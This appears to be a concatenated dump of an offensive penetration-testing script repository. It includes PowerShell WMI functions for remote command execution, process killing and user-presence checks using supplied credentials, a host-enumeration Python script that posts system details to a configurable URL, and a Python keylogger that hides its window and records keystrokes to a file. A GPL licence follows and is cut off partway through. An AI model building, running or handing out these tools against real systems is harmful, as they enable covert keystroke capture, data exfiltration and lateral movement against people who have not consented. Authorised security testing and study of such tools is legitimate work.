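        [Parameter(Mandatory = $False)]
        [string]$User,
        [Parameter(Mandatory = $False)]
        [string]$Pass,
        [Parameter(Mandatory = $False)]
        [string[]]$Targets = ".",
        [Parameter(Mandatory = $False)]
        [string]$ProcName,
        [Parameter(Mandatory = $False)]
        [string]$ProcID
    )

    # The branches previously tested $ProcessName / $ProcessID, which are not parameters of
    # this function and only resolve when a caller's scope happens to define them. Test the
    # function's own parameters, which are also the values used in the filter.
    if($ProcName)
    {
        $filter = "name = '$ProcName'"
    }
    elseif($ProcID)
    {
        $filter = "ProcessID = '$ProcID'"
    }
    else
    {
        # Write-Warning rather than Write-Verbose so the message is visible by default.
        Write-Warning "You didn't provide a valid action to take! This script uses processid or processname!"
        return
    }

    if($User -and $Pass)
    {
        # Explicit credentials supplied: query each target in turn
        $password = ConvertTo-SecureString $Pass -asplaintext -force
        $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password

        ForEach($computer in $Targets)
        {
            Get-WmiObject -Class win32_Process -Credential $cred -Computername $computer -Filter $filter | ForEach-Object { $_.Terminate() }
        }
    }

    else
    {
        # No credentials: act on the local machine only
        Get-WmiObject -Class win32_Process -Filter $filter | ForEach-Object { $_.Terminate() }
    }
}


function Invoke-WmiExecCommand
{
    <#
    .SYNOPSIS
    This function is used to run a command/start a process on either the local or a remote machine. This requires local admin access wherever the command is to be executed.

    .DESCRIPTION
    This function is used to run a command/start a process on either the local or a remote machine. This can be used to simply ping a machine, run an executable, or run any command in the target's system path.

    .PARAMETER User
    Specify a username Default is the current user context.

    .PARAMETER Pass
    Specify the password for the appropriate user.

    .PARAMETER TARGETs
    Host or array of hosts to target. Can be a hostname, IP address, or FQDN. Default is set to localhost.

    .PARAMETER Command
    Specify the command that is executed on the targeted machine.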
120 | 121 | .EXAMPLE 122 | > Invoke-WmiExecCommand -Command ping -n 4 192.168.1.1 123 | This pings the system at 192.168.1.1 with 4 ping requests from the local system 124 | 125 | .EXAMPLE 126 | > Invoke-WmiExecCommand -Command notepad.exe -User Chris -Pass password -Target chrispc 127 | This command authenticates to chrispc and starts notepad.exe 128 | 129 | .LINK 130 | https://github.com/xorrior/RandomPS-Scripts 131 | 132 | #> 133 | 134 | param 135 | ( 136 | #Parameter assignment 137 | [Parameter(Mandatory = $False)] 138 | [string]$User, 139 | [Parameter(Mandatory = $False)] 140 | [string]$Pass, 141 | [Parameter(Mandatory = $False)] 142 | [string[]]$Targets = ".", 143 | [Parameter(Mandatory = $True)] 144 | [string]$Command 145 | ) 146 | 147 | Begin 148 | { 149 | #Check if the TARGETS parameter was passed through the pipeline. Set the usedParameter variable to true. 150 | $usedParameter = $False 151 | if($PSBoundParameters.ContainsKey('TARGETS')) 152 | { 153 | $usedParameter = $True 154 | } 155 | } 156 | 157 | Process 158 | { 159 | #If targets is passed via the parameter, complete function for each host. 160 | if($usedParameter) 161 | { 162 | Foreach($computer in $TARGETS) 163 | { 164 | Invoke-WorkerWmiExecCommand -User "$User" -Pass "$Pass" -Targets "$computer" -Command "$Command" 165 | } 166 | } 167 | #Pass the value from the pipeline to the target parameter if the usedParameter variable is false. 168 | else 169 | { 170 | Invoke-WorkerWmiExecCommand -Command "$Command" 171 | } 172 | } 173 | 174 | end{} 175 | } 176 | 177 | 178 | function Invoke-WMIKillProcess 179 | { 180 | <# 181 | .SYNOPSIS 182 | This function is used to kill a process on either the local or a remote machine via a process name or ID. This requires local admin access wherever the command is to be executed. 183 | 184 | .DESCRIPTION 185 | This function is used to kill a process on either the local or a remote machine via a process name or ID. This requires local admin rights. 
186 | 187 | .PARAMETER User 188 | Specify a username Default is the current user context. 189 | 190 | .PARAMETER Pass 191 | Specify the password for the appropriate user. 192 | 193 | .PARAMETER TARGETs 194 | Host or array of hosts to target. Can be a hostname, IP address, or FQDN. Default is set to localhost. 195 | 196 | .PARAMETER ProcessName 197 | Specify the name of the process that is to be killed on the targeted machine. 198 | 199 | .PARAMETER ProcessID 200 | Specify the process ID number that is to be killed on the targeted machine. 201 | 202 | .EXAMPLE 203 | > Invoke-WMIKillProcess -ProcessName notepad.exe 204 | This kills all processes with the name notepad.exe on the local machine 205 | 206 | .EXAMPLE 207 | > Invoke-WMIKillProcess -ProcessID 2048 -User Chris -Pass password -Target chrispc 208 | This command authenticates to chrispc and and attempts to kill the process with pid 2048. 209 | 210 | .LINK 211 | https://github.com/xorrior/RandomPS-Scripts 212 | #> 213 | 214 | param 215 | ( 216 | #Parameter assignment 217 | [Parameter(Mandatory = $False)] 218 | [string]$User, 219 | [Parameter(Mandatory = $False)] 220 | [string]$Pass, 221 | [Parameter(Mandatory = $False)] 222 | [string]$ProcessName, 223 | [Parameter(Mandatory = $False)] 224 | [string]$ProcessID, 225 | [Parameter(Mandatory = $False)] 226 | [string[]]$TARGETS = "." 227 | ) 228 | 229 | Begin 230 | { 231 | # Check if the TARGETS parameter was passed through the pipeline. Set the usedParameter variable to true. 
232 | $usedParameter = $False 233 | if($PSBoundParameters.ContainsKey('TARGETS')) 234 | { 235 | $usedParameter = $True 236 | } 237 | } 238 | 239 | Process 240 | { 241 | # If targets is passed via the parameter, complete function for each host 242 | if($usedParameter) 243 | { 244 | if($ProcessName) 245 | { 246 | ForEach($computer in $TARGETS) 247 | { 248 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -Targets "$computer" -ProcName $ProcessName 249 | } 250 | } 251 | 252 | elseif($ProcessID) 253 | { 254 | ForEach($computer in $TARGETS) 255 | { 256 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -Targets "$computer" -ProcID $ProcessID 257 | } 258 | } 259 | 260 | else 261 | { 262 | Write-Verbose "You didn't provide a valid action to take! This script uses processid or processname!" 263 | } 264 | } 265 | 266 | #Pass the value from the pipeline to the target parameter if the usedParameter variable is false. 267 | else 268 | { 269 | if($ProcessName) 270 | { 271 | ForEach($computer in $TARGETS) 272 | { 273 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -ProcName $ProcessName 274 | } 275 | } 276 | elseif($ProcessID) 277 | { 278 | ForEach($computer in $TARGETS) 279 | { 280 | Invoke-WorkerWmiKillProcess -User "$User" -Pass "$Pass" -ProcID $ProcessID 281 | } 282 | } 283 | else 284 | { 285 | Write-Verbose "You didn't provide a valid action to take! This script uses processid or processname!" 
286 | } 287 | } 288 | } 289 | 290 | end{} 291 | } 292 | 293 | function Get-RunningProcesses 294 | { 295 | <# 296 | .SYNOPSIS 297 | TBA 298 | Some of this is from - http://blogs.technet.com/b/heyscriptingguy/archive/2009/12/10/hey-scripting-guy-december-10-2009.aspx 299 | .DESCRIPTION 300 | TBA 301 | .PARAMETER TBA 302 | .EXAMPLE 303 | TBA 304 | #> 305 | 306 | param 307 | ( 308 | #Parameter assignment 309 | [Parameter(Mandatory = $False)] 310 | [string]$User, 311 | [Parameter(Mandatory = $False)] 312 | [string]$Pass, 313 | [Parameter(Mandatory = $False)] 314 | [string[]]$TARGETS = "." 315 | ) 316 | 317 | if($User -and $Pass) 318 | { 319 | $password = ConvertTo-SecureString $Pass -asplaintext -force 320 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 321 | Foreach($computer in $TARGETS) 322 | { 323 | Write-Verbose "Connecting to $computer" 324 | Get-WMIObject Win32_Process -Credential $cred -computername $computer | ForEach-Object { $_.ProcessName } | Sort-Object | Get-Unique 325 | } 326 | } 327 | 328 | else 329 | { 330 | Write-Verbose "Checking local system..." 331 | Get-WMIObject Win32_Process | ForEach-Object { $_.ProcessName } | Sort-Object | Get-Unique 332 | } 333 | } 334 | 335 | function Get-ProcessOwners 336 | { 337 | <# 338 | .SYNOPSIS 339 | TBA 340 | Some of this is from - http://blogs.technet.com/b/heyscriptingguy/archive/2009/12/10/hey-scripting-guy-december-10-2009.aspx 341 | .DESCRIPTION 342 | TBA 343 | .PARAMETER TBA 344 | .EXAMPLE 345 | TBA 346 | #> 347 | 348 | param 349 | ( 350 | #Parameter assignment 351 | [Parameter(Mandatory = $False)] 352 | [string]$User, 353 | [Parameter(Mandatory = $False)] 354 | [string]$Pass, 355 | [Parameter(Mandatory = $False)] 356 | [string[]]$TARGETS = "." 
357 | ) 358 | 359 | if($User -and $Pass) 360 | { 361 | $password = ConvertTo-SecureString $Pass -asplaintext -force 362 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 363 | Foreach($computer in $TARGETS) 364 | { 365 | Write-Verbose "Connecting to $computer" 366 | Get-WMIObject Win32_Process -Credential $cred -computername $computer | ForEach-Object { $owner = $_.GetOwner(); '{0}\{1}' -f $owner.Domain, $owner.User } | Sort-Object | Get-Unique 367 | } 368 | } 369 | 370 | else 371 | { 372 | Write-Verbose "Checking local system..." 373 | Get-WMIObject Win32_Process | ForEach-Object { $owner = $_.GetOwner(); '{0}\{1}' -f $owner.Domain, $owner.User } | Sort-Object | Get-Unique 374 | } 375 | } 376 | 377 | 378 | function Query-UsersActive 379 | { 380 | <# 381 | .SYNOPSIS 382 | TBA 383 | Some of this is from - http://www.activxperts.com/admin/scripts/wmi/powershell/0388/ 384 | .DESCRIPTION 385 | TBA 386 | .PARAMETER TBA 387 | .EXAMPLE 388 | TBA 389 | #> 390 | 391 | param 392 | ( 393 | #Parameter assignment 394 | [Parameter(Mandatory = $False)] 395 | [string]$User, 396 | [Parameter(Mandatory = $False)] 397 | [string]$Pass, 398 | [Parameter(Mandatory = $False)] 399 | [string[]]$TARGETS = "." 
400 | ) 401 | 402 | if($User -and $Pass) 403 | { 404 | $password = ConvertTo-SecureString $Pass -asplaintext -force 405 | $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password 406 | Foreach($computer in $TARGETS) 407 | { 408 | # Need to add in filtering here to stop if a "true" has been found for screensavers being active 409 | Write-Verbose "Connecting to $computer" 410 | [string]$ScreenshotActive = Get-RunningProcesses -User $User -Pass $Pass -Targets $Targets | Select-String ".scr" 411 | [string]$LoginPrompt = Get-RunningProcesses -User $User -Pass $Pass -Targets $Targets | Select-String "LogonUI.exe" 412 | 413 | # If either returned true, we can assume the user is not active at their desktop 414 | if ($ScreenshotActive -or $LoginPrompt) 415 | { 416 | Write-Output "User is not present!" 417 | } 418 | else 419 | { 420 | Write-Output "User is at their desktop!" 421 | } 422 | } 423 | } 424 | 425 | else 426 | { 427 | Write-Verbose "Checking local system..." 
428 | Get-WMIObject Win32_Desktop | ForEach-Object { $_.ScreenSaverActive } | Sort-Object | Get-Unique 429 | Get-WMIObject Win32_Process -filter 'name = "LogonUI.exe"' | ForEach-Object { $_.ProcessName } | Sort-Object | Get-Unique 430 | } 431 | } 432 | 433 | # location for managing shares - http://windowsitpro.com/powershell/managing-file-shares-windows-powershell 434 | # (Get-WmiObject Win32_Share -List).Create( "C:\Users\SonofFlynn\Downloads\apple", "testshare", 0 ) -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/.vs/ProcessArchDetection/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ChrisTruncer/PenTestScripts/c55072952bfbe8d3890c981f5e6ddfa5123fe555/HostScripts/ProcessArchDetection/.vs/ProcessArchDetection/v16/.suo -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/ProcessArchDetection.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D} 8 | Exe 9 | ProcessArchDetection 10 | ProcessArchDetection 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | x86 36 | bin\x86\Debug\ 37 | 38 | 39 | x86 40 | bin\x86\Release\ 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /HostScripts/ProcessArchDetection/ProcessArchDetection.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30907.101 5 | 
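MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessArchDetection", "ProcessArchDetection.csproj", "{A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x86 = Debug|x86
12 | Release|Any CPU = Release|Any CPU
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|x86.ActiveCfg = Debug|x86
19 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Debug|x86.Build.0 = Debug|x86
20 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|x86.ActiveCfg = Release|x86
23 | {A253A6AF-4D41-4C17-A25F-4FF97F9F8D9D}.Release|x86.Build.0 = Release|x86
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {92FFFEC2-1E9A-47CA-9F1A-D83C2D48C9E5}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/HostScripts/ProcessArchDetection/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace ProcessArchDetection
{
    /// <summary>
    /// Console tool that lists the processes returned by Process.GetProcesses()
    /// and prints, for each one, its name, its process ID and whether it is a
    /// 32-bit process.
    /// </summary>
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern bool IsWow64Process(IntPtr hProcess, out bool isWow64Process);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(
            ProcessAccessFlags processAccess,
            bool bInheritHandle,
            int processId
        );

        // Handles returned by OpenProcess are kernel objects and must be released.
        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern bool CloseHandle(IntPtr hObject);

        /// <summary>Convenience overload: opens <paramref name="proc"/> by its ID, without handle inheritance.</summary>
        public static IntPtr OpenProcess(Process proc, ProcessAccessFlags flags)
        {
            return OpenProcess(flags, false, proc.Id);
        }

        /// <summary>Access-right bits accepted by OpenProcess.</summary>
        [Flags]
        public enum ProcessAccessFlags : uint
        {
            All = 0x001F0FFF,
            Terminate = 0x00000001,
            CreateThread = 0x00000002,
            VirtualMemoryOperation = 0x00000008,
            VirtualMemoryRead = 0x00000010,
            VirtualMemoryWrite = 0x00000020,
            DuplicateHandle = 0x00000040,
            CreateProcess = 0x000000080,
            SetQuota = 0x00000100,
            SetInformation = 0x00000200,
            QueryInformation = 0x00000400,
            QueryLimitedInformation = 0x00001000,
            Synchronize = 0x00100000
        }

        /// <summary>
        /// Prints one record per process: "Name", "Process ID" and "Is it x86".
        /// The last field is True/False, or "unknown (...)" with the Win32 error
        /// code when the process could not be opened or queried.
        /// </summary>
        static void Main(string[] args)
        {
            bool is64BitOs = Environment.Is64BitOperatingSystem;

            foreach (Process proc in Process.GetProcesses())
            {
                // Process wraps native resources; release each one as soon as it is printed.
                using (proc)
                {
                    Console.WriteLine("Name: " + proc.ProcessName);
                    Console.WriteLine("Process ID: " + proc.Id);
                    Console.WriteLine("Is it x86: " + DescribeIsX86(proc.Id, is64BitOs));
                    Console.WriteLine("\n");
                }
            }
        }

        /// <summary>
        /// Returns "True" when the process runs under WOW64 (a 32-bit process on
        /// 64-bit Windows), "False" when it does not, and an "unknown (...)" text
        /// when the answer could not be obtained.
        /// </summary>
        private static string DescribeIsX86(int processId, bool is64BitOs)
        {
            // IsWow64Process reports false for every process on 32-bit Windows,
            // where all processes are 32-bit, so answer that case directly.
            if (!is64BitOs)
            {
                return bool.TrueString;
            }

            // Least privilege: IsWow64Process only needs the limited query right.
            // Asking for ProcessAccessFlags.All is refused for many system and
            // protected processes, and the failed open was previously reported
            // as "False".
            IntPtr handle = OpenProcess(ProcessAccessFlags.QueryLimitedInformation, false, processId);
            if (handle == IntPtr.Zero)
            {
                return "unknown (OpenProcess failed, Win32 error " + Marshal.GetLastWin32Error() + ")";
            }

            try
            {
                bool isWow64;
                if (!IsWow64Process(handle, out isWow64))
                {
                    return "unknown (IsWow64Process failed, Win32 error " + Marshal.GetLastWin32Error() + ")";
                }

                return isWow64.ToString();
            }
            finally
            {
                // The original never closed the handle, leaking one per process.
                CloseHandle(handle);
            }
        }
    }
}

--------------------------------------------------------------------------------
/HostScripts/ProcessArchDetection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.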
8 | [assembly: AssemblyTitle("ProcessArchDetection")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ProcessArchDetection")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("a253a6af-4d41-4c17-a25f-4ff97f9f8d9d")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /HostScripts/ShareDumper.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-ShareDumper 2 | { 3 | <# This function performs a recursive listing against all shares provided in a file #> 4 | param 5 | ( 6 | [Parameter(Mandatory = $True)] 7 | [string]$SharePath, 8 | [Parameter(Mandatory = $True)] 9 | [string]$FilePath 10 | ) 11 | 12 | Process 13 | { 14 | $sharelist = Get-Content $SharePath 15 | 16 | foreach ($path in $sharelist) 17 | { 18 | Write-Verbose "Parsing $path" 19 | if($FilePath) 20 | { 21 | $results += Get-ChildItem -ErrorAction SilentlyContinue -Recurse $path 22 | } 23 | else 24 | { 25 | Get-ChildItem 
-ErrorAction SilentlyContinue -Recurse $path
26 | }
27 | }
28 | if ($FilePath)
29 | {
30 | $results | Out-File $FilePath
31 | }
32 | }
33 | }
--------------------------------------------------------------------------------
/HostScripts/enumeration.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

# This script collects information about the local system (host name, IP
# addresses, drive letters with free space, running processes) and sends it
# in a single HTTP POST to the URL configured below.
#
# NOTE(review): Python 2 and Windows only as written: urllib2 and
# string.uppercase do not exist in Python 3, and ctypes.windll exists only on
# Windows.
# NOTE(review): from a monitoring point of view the visible behaviour is a
# Python process that runs tasklist and then makes one outbound HTTPS POST.

import ctypes
import os
import socket
import string
import subprocess
import urllib2

# URL - You obviously need to edit this, just the IP/domain
url = "https://192.168.1.1/post_enum_data.php"

# Enumerate IP addresses and hostname
# gethostbyname_ex returns (hostname, alias list, IP address list).
host, alias, ip = socket.gethostbyname_ex(socket.gethostname())

# Get full hostname (including domain if applicable)
# This overwrites the short host name obtained above.
host = socket.getfqdn()

# Enumerate system drives
drive_space = {}
drives = []
# GetLogicalDrives returns a bitmask: bit 0 is drive A, bit 1 is drive B, ...
bitmask = ctypes.windll.kernel32.GetLogicalDrives()
for letter in string.uppercase:
    if bitmask & 1:
        drives.append(letter)
    bitmask >>= 1

# get username based off of environmental variable
# might not be true, but probably us
# NOTE(review): username is read here but never added to data_to_transmit.
username = os.getenv('USERNAME')

# Get space per drive
for drive_letter in drives:
    free_bytes = ctypes.c_ulonglong(0)
    # The fourth argument receives the total number of free bytes on the drive;
    # the return value of the call is not checked.
    ctypes.windll.kernel32.GetDiskFreeSpaceExW(
        ctypes.c_wchar_p(drive_letter + ":"), None, None, ctypes.pointer(
            free_bytes))
    # Integer division under Python 2: the result is whole megabytes.
    free_megs = free_bytes.value / 1024 / 1024
    drive_space[drive_letter] = free_megs

# Get running processes
# check_output raises CalledProcessError if tasklist exits with a non-zero status.
tasklist_output = subprocess.check_output("tasklist")

data_to_transmit = "hostname - " + str(host) + "\nIP Address(es) - " + str(ip) + "\nSystem Drives and Free Space in Megs - " + str(drive_space) + "\nTasklist Output - " + tasklist_output

# Post the data over https
# Supplying a data argument makes urlopen send a POST; the body is the raw
# string above, not form-encoded.
# NOTE(review): whether the server certificate is verified depends on the
# Python 2 release in use (verification by default starts with 2.7.9).
f = urllib2.urlopen(url, data_to_transmit)
f.close()
-------------------------------------------------------------------------------- /HostScripts/keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import win32console 3 | import win32gui 4 | import pythoncom 5 | import pyHook 6 | 7 | # This is completely based off the code at this URL (with very minor mods) 8 | # https://github.com/blaz1988/keylogger/blob/master/keylogger.py 9 | 10 | win=win32console.GetConsoleWindow() 11 | win32gui.ShowWindow(win,0) 12 | 13 | def OnKeyboardEvent(event): 14 | if event.Ascii==5: 15 | _exit(1) 16 | if event.Ascii !=0 or 8: 17 | f=open('C:\Users\Christopher\Downloads\output.txt','r+') 18 | buffer=f.read() 19 | f.close() 20 | f=open('C:\Users\Christopher\Downloads\output.txt','w') 21 | keylogs=chr(event.Ascii) 22 | if event.Ascii==13: 23 | keylogs='/n' 24 | buffer+=keylogs 25 | f.write(buffer) 26 | f.close() 27 | f1 = open('C:\Users\Christopher\Downloads\output.txt', 'w') 28 | f1.write('Incoming keys:\n') 29 | f1.close() 30 | hm=pyHook.HookManager() 31 | hm.KeyDown=OnKeyboardEvent 32 | hm.HookKeyboard() 33 | pythoncom.PumpMessages() 34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. {http://fsf.org/} 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. 
By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. 
For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 
83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 
117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 
146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 
